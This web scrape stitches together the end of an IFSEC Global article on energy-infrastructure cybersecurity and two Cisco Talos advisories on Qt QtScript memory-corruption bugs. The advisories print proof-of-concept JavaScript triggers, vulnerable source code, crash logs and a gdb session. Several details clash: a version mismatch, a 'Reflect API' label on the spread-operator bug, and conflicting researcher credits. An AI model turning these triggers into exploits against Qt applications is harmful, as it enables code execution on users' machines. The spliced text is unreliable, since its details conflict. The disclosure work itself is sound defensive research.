"This is a vulnerability that can be, and has been, exploited to attack the power system," he told online publication PV Tech in November 2020. And while currently the potential risk of a cybersecurity attack to solar power networks remains low because the technology hasn't yet reached critical mass, as it becomes more decentralized — with solar panels installed in public places and on top of buildings — managing networks will increasingly rely on robust, cloud-based IoT security.

**Greater Regulation**

One way that governments as well as organizations can ensure the highest levels of CNI protection is with the implementation of standards. For example, Germany put in IT security laws several years ago, making it mandatory for all network providers, operators, and other CNI businesses to ensure they meet the ISO 27001 family of standards for information security management systems (ISMS), while in the UK there are obligations stipulated in the BSI Criticality Ordinance to demonstrate a complete IT security strategy to secure the operation of critical infrastructure.

Similarly in the US, the NERC CIP (North American Electric Reliability Corporation Critical Infrastructure Protection) group of standards govern critical infrastructure of all entities that materially affect the BES (Bulk Electrical System) in North America — though this set of standards only applies to electricity and not to the oil and gas industries. According to Cliff Martin, head of cyber incident response at GRCI Law, a legal, risk, and compliance consultancy firm, staff who are responsible for CNI need to be trained accordingly and understand that their actions can have real consequences. "This means they can't simply copy and paste traditional IT cybersecurity measures over to the IT environment — it just doesn't work like that."

However, Illumio's Dearing says that what's happening is that more and more companies are developing a single strategy for both OT and IT environments. "The key," he says, "is to assume you are going to be breached and plan accordingly. If you segment by separating out all the different bits of your infrastructure, then an attack on one part isn't necessarily going to have a knock-on effect on all the other parts."

The war in Ukraine and attacks on the Nord Stream pipelines have alerted companies to the physical threat posed to energy infrastructure, especially during winter in the northern hemisphere. However, that's not the only concern. Cybersecurity attacks on CNI are increasing, partly because of a growing threat from nation-state actors but also because cybercriminals are realizing that they can make serious money from potentially denying a much-needed service to customers. At the same time, the convergence of OT and IT technologies is providing a potentially much greater attack surface for cybercriminals to target.

Whereas traditionally security has not been seen as a critical consideration for OT, this needs to change with an increased focus on technical solutions such as segmentation and continuous monitoring of network traffic if companies are going to prevent a potentially catastrophic breach to CNI from taking place.

_**—Story by Chris Price**_

_This story first appeared on_ _IFSEC Global__, part of the Informa Network, and a leading provider of news, features, videos, and white papers for the security and fire industry. IFSEC Global covers developments in long-established physical technologies — like video surveillance, access control, intruder/fire alarms, and guarding — and emerging innovations in cybersecurity, drones, smart buildings, home automation, the Internet of Things, and more._

Securing the World's Energy Systems: Where Physical Security and Cybersecurity Must Meet

A buffer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an out-of-bounds memory access, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**SUMMARY**

A buffer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an out-of-bounds memory access, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Qt Project Qt 6.4

**PRODUCT URLS**

Qt - https://www.qt.io/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Qt is a popular software suite primarily used to create graphical user interfaces. It also contains a number of supporting libraries which all aim to enable cross-platform application development with a unified programming API.

Qt’s suite of libraries contains support for executing Javascript code through its QtScript engine, which is extensively used in QML. QtScript is historically based on WebKit’s JavaScriptCore, but the current codebase bears little resemblance to modern JavaScriptCore engine.

QtScript implementation supports a Javascript argument spreading syntax via use of ... operator, where an array is spread into a list of arguments for a function call. QtScript’s implementation of argument spreading is vulnerable to a heap overflow. The vulnerability can be demonstrated with the following PoC Javascript code:

    var a = [] 
    a.length =  555840;
    Math.max(...a)
    

In the above code, a simple array is constructed and its length set to a large value. This array is then used in a function call with a spreading ... operator, which invokes spreading code in QtScript’s runtime:

    static CallArgs createSpreadArguments(Scope &scope, Value *argv, int argc)
    {
        ScopedValue it(scope);
        ScopedValue done(scope);
    
        int argCount = 0;
    
        Value *v = scope.alloc<Scope::Uninitialized>();                        [1]
        Value *arguments = v;                                                  [2]
        for (int i = 0; i < argc; ++i) {
            if (!argv[i].isEmpty()) {
                *v = argv[i];
                ++argCount;
                v = scope.alloc<Scope::Uninitialized>();
                continue;
            }
            // spread element
            ++i;
            it = Runtime::GetIterator::call(scope.engine, argv[i], /* ForInIterator */ 1);              [3]
            if (scope.hasException())
                return { nullptr, 0 };
            while (1) {
                done = Runtime::IteratorNext::call(scope.engine, it, v);                              [4]
                if (scope.hasException())
                    return { nullptr, 0 };
                Q_ASSERT(done->isBoolean());
                if (done->booleanValue())
                    break;
                ++argCount;                                                                       [5]
                v = scope.alloc<Scope::Uninitialized>();                                          [6]
            }
        }
        return { arguments, argCount };
    }
    

Above code implements the function that turns an array into a list of arguments to be passed into a function call. At \[1\] and \[2\] scoped allocation for arguments is made. At \[3\] an iterator through the input arguments is created and is then used at \[4\] inside an infinite while loop as long as there are elements. With each iteration, argCount is incremented at \[5\] and space for a new value is allocated at \[6\]. Allocation is performed via call to scope.alloc with no parameters, which ends up in the following code:

    QML_NEARLY_ALWAYS_INLINE Value *alloc() const
    {
        Value *ptr = engine->jsAlloca(1);
        switch (mode) {
        case Undefined:
            *ptr = Value::undefinedValue();
            break;
        case Empty:
            *ptr = Value::emptyValue();
            break;
        case Uninitialized:
            break;
        }
        return ptr;
    }
    

Above code allocates space for one more value on the runtime stack by simply incrementing the pointer, without performing any additional checks for available space. Therefore, in a call to createSpreadArguments, elements can keep being allocated until the buffer overflows into adjacent memory or a guard page is hit. This can result in adjacent memory overwrite. Additionally, since the contents of the sparse array being spread is under control, a precise value being written out of bounds can easily be controlled (empty array entries result in zeros being written into v pointer, where non-zero depends on the type, primitive types being written verbatim).

Since the Javascript execution environment presents many ways of precisely manipulating memory layout, this vulnerability could be abused to cause further memory corruption, which can ultimately result in arbitrary code execution.

**Crash Information**

    ==1198788==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7ffff52c2000 (pc 0x00000091f222 bp 0x00000159db70 sp 0x7fffffffd250 T1198788)
    ==1198788==The signal is caused by a WRITE memory access.
        #0 0x91f222 in QV4::Object::internalPut(QV4::PropertyKey, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x91f222)
        #1 0x91f00d in QV4::Object::internalPut(QV4::PropertyKey, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x91f00d)
        #2 0x8fff92 in QV4::IteratorPrototype::createIterResultObject(QV4::ExecutionEngine*, QV4::Value const&, bool) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8fff92)
        #3 0xda0d8b in QV4::ArrayIteratorPrototype::method_next(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0xda0d8b)
        #4 0x9803ac in QV4::Runtime::IteratorNext::call(QV4::ExecutionEngine*, QV4::Value const&, QV4::Value*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9803ac)
        #5 0x986f8e in QV4::createSpreadArguments(QV4::Scope&, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x986f8e)
        #6 0x986cf7 in QV4::Runtime::CallWithSpread::call(QV4::ExecutionEngine*, QV4::Value const&, QV4::Value const&, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x986cf7)
        #7 0x9d8804 in QV4::Moth::VME::interpret(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*, char const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d8804)
        #8 0x9d5bbc in QV4::Moth::VME::exec(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d5bbc)
        #9 0x8e4a77 in QV4::Function::call(QV4::Value const*, QV4::Value const*, int, QV4::ExecutionContext*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8e4a77)
        #10 0x98f487 in QV4::Script::run(QV4::Value const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x98f487)
        #11 0x8779ae in QJSEngine::evaluate(QString const&, QString const&, int, QList<QString>*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8779ae)
        #12 0x428dd6 in main /home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/main.cpp:106:32
        #13 0x7ffff5a9e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #14 0x4123cd in _start (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x4123cd)
    

**TIMELINE**

2022-11-10 - Initial Vendor Contact

2022-11-10 - Vendor Disclosure

2023-01-12 - Public Release

Discovered by Aleksandar Nikolic of Cisco Talos.

CVE-2022-43591: TALOS-2022-1650 || Cisco Talos Intelligence Group

An integer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an integer overflow during memory allocation, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**SUMMARY**

An integer overflow vulnerability exists in the QML QtScript Reflect API of Qt Project Qt 6.3.2. A specially-crafted javascript code can trigger an integer overflow during memory allocation, which can lead to arbitrary code execution. Target application would need to access a malicious web page to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Qt Project Qt 6.3.2.

**PRODUCT URLS**

Qt - https://www.qt.io/

**CVSSv3 SCORE**

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

**CWE**

CWE-190 - Integer Overflow or Wraparound

**DETAILS**

Qt is a popular software suite primarily used to create graphical user interfaces. It also contains a number of supporting libraries which all aim to enable cross-platform application development with a unified programming API.

Qt’s suite of libraries contains support for executing Javascript code through its QtScript engine, which is extensively used in QML. QtScript is historicaly based on WebKit’s JavaScriptCore, but the current codebase bears little resemblance to modern JavaScriptCore engine.

QtScript implementation supports a set of Reflect Javascript APIs and methods such as Reflect.apply(), which contains an integer overflow vulnerability. The vulnerability can be demonstrated with the following PoC Javascript code:

const v1 = [];
const v3 = [];
v3.length = 3900000000;
Reflect.apply(v1.reverse,v1,v3);

In the above code, two arrays are constructed. The second array has its length property set to a large number. Method Refclect.apply takes three arguments. First is the function to be “applied”, second is the object to which the function is to be applied and third is supposed to be an array of potential arguments to the function. In this example, method reverse of an Array object is being applied, with a task to simply reverse the array. The vulnerability is triggered even though method reverse doesn’t expect or use the array v3. The root cause of the vulnerability can be seen in the following source code:

    static CallArgs createListFromArrayLike(Scope &scope, const Object *o)
    {
        int len = o->getLength();                                                                                       [3]
        Value *arguments = scope.alloc(len);                                                                            [4]
    
        for (int i = 0; i < len; ++i) {
            arguments[i] = o->get(i);                                                                                      [5]
            if (scope.hasException())
                return { nullptr, 0 };
        }
        return { arguments, len };
    }
    
        ReturnedValue Reflect::method_apply(const FunctionObject *f, const Value *, const Value *argv, int argc)             [0]
    {
        Scope scope(f);
        if (argc < 3 || !argv[0].isFunctionObject() || !argv[2].isObject())
            return scope.engine->throwTypeError();
    
        const Object *o = static_cast<const Object *>(argv + 2);
        CallArgs arguments = createListFromArrayLike(scope, o);                                                              [1]
        if (scope.hasException())
            return Encode::undefined();
    
        return checkedResult(scope.engine, static_cast<const FunctionObject &>(argv[0]).call(                               [2]
                    &argv[1], arguments.argv, arguments.argc));
    }
    

In the above code quote we can observe the implementation of Reflect.apply method starting at \[0\]. After some sanity checking, the code at \[1\] takes the 3rd argument to apply() and tries to turn it into a list from an array-like object via createListFromArrayLike. Finally, at \[2\], a call to the target function (reverse in our PoC) is made. The core of the issue lies in the createListFromArrayLike function. In it, at \[3\], the length of the array (3900000000 in our PoC) is retrieved and used in an allocation at \[4\]. Note that len is a signed integer. Further, len is again used at \[5\] as a guard in a for loop that tries to copy the elements. The actual integer overflow happens during a call at \[4\], which indirectly leads to the following code:

    QML_NEARLY_ALWAYS_INLINE Value *jsAlloca(int nValues) {
        Value *ptr = jsStackTop;
        jsStackTop = ptr + nValues;
        return ptr;
    }
    

In the above code, to allocate the memory for the list, a number of values is simply added to a pointer. Since pointers are 8 bytes in size, the compiler will implicitly multiply the length by 8 to satisfy pointer arithmetic rules. With a large value for v3.length this can lead to an integer overflow and wraparound during allocation. This integer overflow then leads to further memory corruption. The exact point of integer overflow can be observed in the debugger (do note that most of the above-quoted functions are actually inlined):

    Breakpoint 16, 0x000000000096bfbb in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) x/10i $pc
    => 0x96bfbb <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+203>:    mov    rdi,QWORD PTR [r13+0x8]                      [6]
       0x96bfbf <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+207>:    movsxd rax,ebp
       0x96bfc2 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+210>:    lea    rcx,[rdi+rax*8]
       0x96bfc6 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+214>:    mov    QWORD PTR [r13+0x8],rcx
       0x96bfca <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+218>:    test   eax,eax
       0x96bfcc <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+220>:    mov    QWORD PTR [rsp],rdi
       0x96bfd0 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+224>:
        jle    0x96c072 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+386>
       0x96bfd6 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+230>:    mov    QWORD PTR [rsp+0x8],rbp
       0x96bfdb <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+235>:    mov    ebp,ebp
       0x96bfdd <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+237>:    lea    rdx,[rbp*8+0x0]
    (gdb) i r ebp
    ebp            0xe8754700          -394967296                                                                                                                              [7]
    (gdb) stepi
    0x000000000096bfbf in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) stepi
    0x000000000096bfc2 in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) x/i $pc
    => 0x96bfc2 <QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int)+210>:    lea    rcx,[rdi+rax*8]                            [8]
    (gdb) i r rax
    rax            0xffffffffe8754700  -394967296
    (gdb) i r rdi
    rdi            0x7ffff4e845a0      140737302250912
    (gdb) stepi
    0x000000000096bfc6 in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) i r rcx
    rcx            0x7fff38927da0      140734142512544
        (gdb) x/x $rcx                                                                                                           [9]
    0x7fff38927da0: Cannot access memory at address 0x7fff38927da0
    (gdb)
    

A breakpoint was set at \[6\] just before the pointer arithemtic. Observe that value of length is in 4 byte ebp register at \[7\]. The instruction at \[8\] actually calculates the new pointer by multiplying rax (sign extended length value from ebp) by the size of a pointer and adding it to rdi before storing it into rcx. The command at \[9\] shows that rcx now points to invalid memory. Any further operation using this pointer of length will result in additional memory corruption. Continuing execution finally leads to a following crash:

    (gdb) c
    Continuing.
    
    Program received signal SIGSEGV, Segmentation fault.
    0x0000000000da87d9 in QV4::ArrayPrototype::method_reverse(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) ()
    (gdb) c
    Continuing.
    UndefinedBehaviorSanitizer:DEADLYSIGNAL
    ==370803==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x7fff38927da0 (pc 0x000000da87d9 bp 0x7ffff48d1d20 sp 0x7fffffffd2c0 T370803)
    ==370803==The signal is caused by a WRITE memory access.
    [Detaching after fork from child process 370824]
        #0 0xda87d9 in QV4::ArrayPrototype::method_reverse(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0xda87d9)
        #1 0x96c0de in QV4::Reflect::method_apply(QV4::FunctionObject const*, QV4::Value const*, QV4::Value const*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x96c0de)
        #2 0x985e7e in QV4::Runtime::CallProperty::call(QV4::ExecutionEngine*, QV4::Value const&, int, QV4::Value*, int) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x985e7e)
        #3 0x9d7bc5 in QV4::Moth::VME::interpret(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*, char const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d7bc5)
        #4 0x9d5bbc in QV4::Moth::VME::exec(QV4::JSTypesStackFrame*, QV4::ExecutionEngine*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x9d5bbc)
        #5 0x8e4a77 in QV4::Function::call(QV4::Value const*, QV4::Value const*, int, QV4::ExecutionContext*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8e4a77)
        #6 0x98f487 in QV4::Script::run(QV4::Value const*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x98f487)
        #7 0x8779ae in QJSEngine::evaluate(QString const&, QString const&, int, QList<QString>*) (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x8779ae)
        #8 0x428dd6 in main /home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/main.cpp:106:32
        #9 0x7ffff5a9e082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16
        #10 0x4123cd in _start (/home/anikolich/projects/qt6/qtdeclarative/examples/qml/shell/shell+0x4123cd)
    

The above crash is inside method_reverse which is the implementation of Array.reverse. However, the same vulnerability can be triggered through any target function supplied to Reflect.apply. Since the Javascript execution environment presents many ways of precisely manipulating memory layout, this vulnerability could be abused to cause further memory corruption, which can ultimately result in arbitrary code execution.

**TIMELINE**

2022-09-27 - Initial Vendor Contact  
2022-10-11 - Vendor Disclosure  
2023-01-12 - Public Release

Emma Reuter and Theo Morales of Cisco ASIG.

Tag

#cisco